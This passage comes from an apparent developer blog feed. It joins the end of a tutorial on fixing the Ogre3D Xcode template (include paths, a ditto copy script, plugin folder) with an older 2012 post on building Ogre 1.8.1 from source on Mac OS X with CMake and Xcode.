<p>Next, move to the “Build Phases” tab and expand the “Link Binary With Libraries” section. You should see Ogre.framework, OpenGL.framework, and QuartzCore.framework appearing in red. I think this is a problem with the template itself, but in any case, it’s easily fixed. For the latter two, simply hit the + button and find them in the list of Apple frameworks, and then delete the red list entries.</p>
<p>Ogre.framework can be found in the lib/debug folder in your build directory, so add that to your project as well.</p>
<p>Now hit build. If everything is identical to my set up, you should get a build error saying that OgreCamera.h can’t be found. There’s a good reason for this: the include paths are missing a few directories. Rather than describe how to fix this, I’ve attached a screenshot of what my include paths end up looking like when I’m through fixing them. “1.81” is the folder which stores my built Ogre3D library, and “ogre_src_v1-8-1” is the root folder of the Ogre SDK.</p>
<p><img src="/images/post_images/taming-the-ogre2/include_paths.png" alt="Include Paths" /></p>
<p>This may not be the most optimal way to set up your include paths (I’m really, really hoping it isn’t, it’s pretty messy), but I’ve run into strange issues marking things recursive, and so far, this set up has worked for me. Let me know if there’s a better way of doing things in the comments, and I’ll update this tutorial.</p>
<p>Next move to the Library Search paths, and ensure that both paths are pointing to the correct location of the files they need. One should be pointing to the location of your ogre lib, and the other to the lib folder of your dependencies. If you hit build and see an error like this:</p>
<p><img src="/images/post_images/taming-the-ogre2/lOIS_error.png" alt="Error Message" /></p>
<p>it means that this step has not been done correctly.</p>
<h3 id="restrict-your-architectures">Restrict your architectures!</h3>
<p>Next ensure that your project is set to build only for the 64 bit architecture. As I mentioned in the last post, currently my set up is only configured to build for 64 bit machines, because I was running into a boat load of configuration errors trying to build for i386 as well. Since I’m nowhere near releasing something with OGRE just yet, I’ve decided to put off figuring out i386 config issues until I absolutely have to.</p>
<h3 id="catching-a-wild-ditto">Catching a wild Ditto!</h3>
<p>If you hit build now, you should end up with 1 error, the cryptically named “shell script invocation error,” which looks something like this:</p>
<p><img src="/images/post_images/taming-the-ogre2/ditto_error.png" alt="Ditto Error" /></p>
<p>It’s a shame that this isn’t more descriptive, because it took me a long time to understand exactly what was going on, but fixing it is dead simple once you know what the error means.</p>
<p>Ogre’s build process involves copying files from your Media paths to the content folder of the built application. This is done at the end of your build process by a shell script, and the script used to copy these files is called ditto. All this error is saying, is that a path supplied to the ditto command is wrong.</p>
<p>To fix this, go back to your project settings, and get to your “Build Phases” tab. Expand the “Run Script” item (it should be at the bottom of your build phases list), and you should immediately see the ditto commands.</p>
<p>The offender is the last line,</p>
<p>ditto $PROJECT_DIR/$PROJECT_NAME/*.cfg "$BUILT_PRODUCTS_DIR/Tutorial.app/Contents/Resources/"</p>
<p>(Note: Tutorial.app will be replaced by whatever you called the project on your machine)</p>
<p>There’s a problem with the location of quotation marks here, which is causing the source path to be misinterpreted. Simply move the punctuation around to solve:</p>
<p>ditto "$PROJECT_DIR/$PROJECT_NAME/"*.cfg "$BUILT_PRODUCTS_DIR/Tutorial.app/Contents/Resources/"</p>
<p>Hit build now, you should (finally) have a successful compile.</p>
<h3 id="not-there-yet">Not there yet.</h3>
<p>Unfortunately, we’re not done, because now we get to sort through runtime errors. In your output, or your Ogre log file, you should see a message along the lines of</p>
<p>OGRE EXCEPTION(7:InternalErrorException): Could not load dynamic library ./RenderSystem_GL.</p>
<p>This is because we haven’t configured OGRE to know where our Plugins are yet. The quickest way to fix this is to open up the file plugins.cfg, and replace</p>
<p>PluginFolder=./</p>
<p>with</p>
<p>PluginFolder= (path to build/lib/release)</p>
<p>Now, hit build/run one more time, and you should be greeted with this screen:</p>
<p><img src="/images/post_images/taming-the-ogre2/config_screen.png" alt="Config Screen" /></p>
<p>Hit ok again to finally view the sum of all of our hard work:</p>
<p><img src="/images/post_images/taming-the-ogre2/ogrehead.png" alt="Ogre Head" /></p>
<p>Finally, it’s all working! If you run into any problems not addressed here, grab me on Twitter and we can work through it. I’d love to dig into this build process more through troubleshooting problems I haven’t hit yet. Additionally, if anyone has a better way of getting all of this done / setting up an Ogre project in Xcode, I’d love to hear about it, because I’m really hoping there’s a less messy way of getting it all set up / configuring it for i386. Regardless, thanks for reading!</p>
Building Ogre 1.81 on Lion2012-11-19T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2012/11/19/Taming-The-Ogre-Part1<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2012!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br />
I’ve recently decided that I need to go open source for my hobby projects, namely because I’ve reached a point where Unity Free is becoming too restrictive for my tastes, yet I’m still too poor to buy Unity Pro (one day I’ll make a game that pays for more than a night at a bar, but that day hasn’t happened yet).</p>
<p>After spending a long week trying to make JMonkey suit my needs (namely: an asset pipeline that doesn’t make me want to shoot myself), I abandoned it and meekly returned to the engine of my third year at Humber: Ogre3D. I had only worked with the precompiled Windows binaries until now, but how hard could building it from source (because if I’m going open source, I may as well embrace the whole deal) on my Mac be?</p>
<p>Three days of pulling my hair out later, I finally have not only Ogre 1.81 built on my Mac, but also the Xcode 4 template project compiling. Because there’s absolutely no reason that ANYONE should have to spend three days weeding through outdated tutorials, I’m posting the whole process here in exhaustive detail, in the hope that it helps at least one other poor soul trying to do this.</p>
<p>This post will ONLY cover building the engine itself. The next article will cover how to get the Xcode 4 templates to work (they’re broken in some weird spots in Xcode 4.5).</p>
<h3 id="ingredients">Ingredients</h3>
<ul>
<li>OGRE 1.8.1 Source for Linux/OSX</li>
<li>Mac OS X Ogre Dependencies – (this tutorial assumes you’re grabbing the precompiled ones, just to limit the number of things that can go wrong)</li>
<li>CG Framework</li>
<li>CMake 2.8.10.1</li>
<li>This tutorial assumes you’re using Xcode 4.5, although I don’t know if that makes a difference for what we’re doing.</li>
</ul>
<h3 id="setting-up-the-source-directory">Setting up the source directory</h3>
<ul>
<li>Extract the Ogre src zip file into wherever you want your Ogre SDK to be installed to. I just put it in my Macintosh HD directory so that it was easy to find, but I think the more correct place to put it is in ~/Library/Developer/SDKs</li>
<li>Extract the precompiled dependencies into the top level folder in the Ogre SDK directory (in my case /ogre_src_v1-8-1/)</li>
<li>Create a directory in your root folder called “boost”</li>
<li>Drag the folder called boost out of Dependencies/include into the boost folder you just made</li>
<li>Create a folder called lib in the boost folder (i.e. /ogre_src_v1-8-1/boost/lib)</li>
<li>Drag the boost libraries at Dependencies/lib into this folder.</li>
</ul>
<h3 id="cooking-with-cmake">Cooking With CMake</h3>
<ul>
<li>Start CMake’s GUI tool</li>
<li>Hit the Browse Source button on the top right, and select the Ogre SDK folder that you’ve been working with</li>
<li>Copy and paste this directory into the “Where to build the binaries” field as well. Add the name of your build folder to the end of this path. For me, this was /ogre_src_v1-8-1/1.81, but the name of the folder isn’t important; what matters is that this build folder IS NOT your root SDK folder. That way, if something goes wrong, you can start the build process over again without having to redo all the previous steps.</li>
<li>Hit “Configure” and make sure that “Xcode” and “Use default native compilers” are selected. Then click Done</li>
<li>You should see a bunch of options highlighted in red. That’s fine. Ensure that OGRE_BUILD_CG is selected, and then press Configure again. NOTE: the CMake console will show a number of warnings in red. IGNORE THESE.</li>
<li>Once that’s done, click “Generate” and exit CMake</li>
</ul>
<h3 id="building-ogre">Building Ogre</h3>
<ul>
<li>Navigate to your build directory now, and open the Xcode project you just generated.</li>
<li>Delete i386 from your project’s valid architectures (otherwise boost complains. Long term, I think only building for 64 bit is going to cause some problems, but in the interest of getting things running quickly, I ignored these worries for now)</li>
<li>Set your project to build for “My Mac 64-bit,” and your Architectures to “64-bit-intel”</li>
<li>Hit build, watch the magic happen.</li>
<li>If you want to, once the build is complete, change your build to release mode and build again to get Ogre built in release.</li>
</ul>
<h3 id="verifying-the-build">Verifying the Build</h3>
<ul>
<li>You should now have 2 folders in your build directory’s bin folder (Release and Debug). Inside each folder should be a copy of SampleBrowser.app. To ensure everything is working, run one of these programs and go through each sample.</li>
<li>Hopefully all the samples should be in working order. Congratulations, you now have a built copy of Ogre sitting on your computer!</li>
</ul>
<p>If you run into any problems, message me on twitter and I’ll do my best to figure out what’s going on with your build. I’m definitely not an expert, or even demonstrably good at using Ogre, but I’d like to think that all the troubleshooting I’ve done this week makes me a decent resource when it comes to just building the engine on mac. Good luck!</p>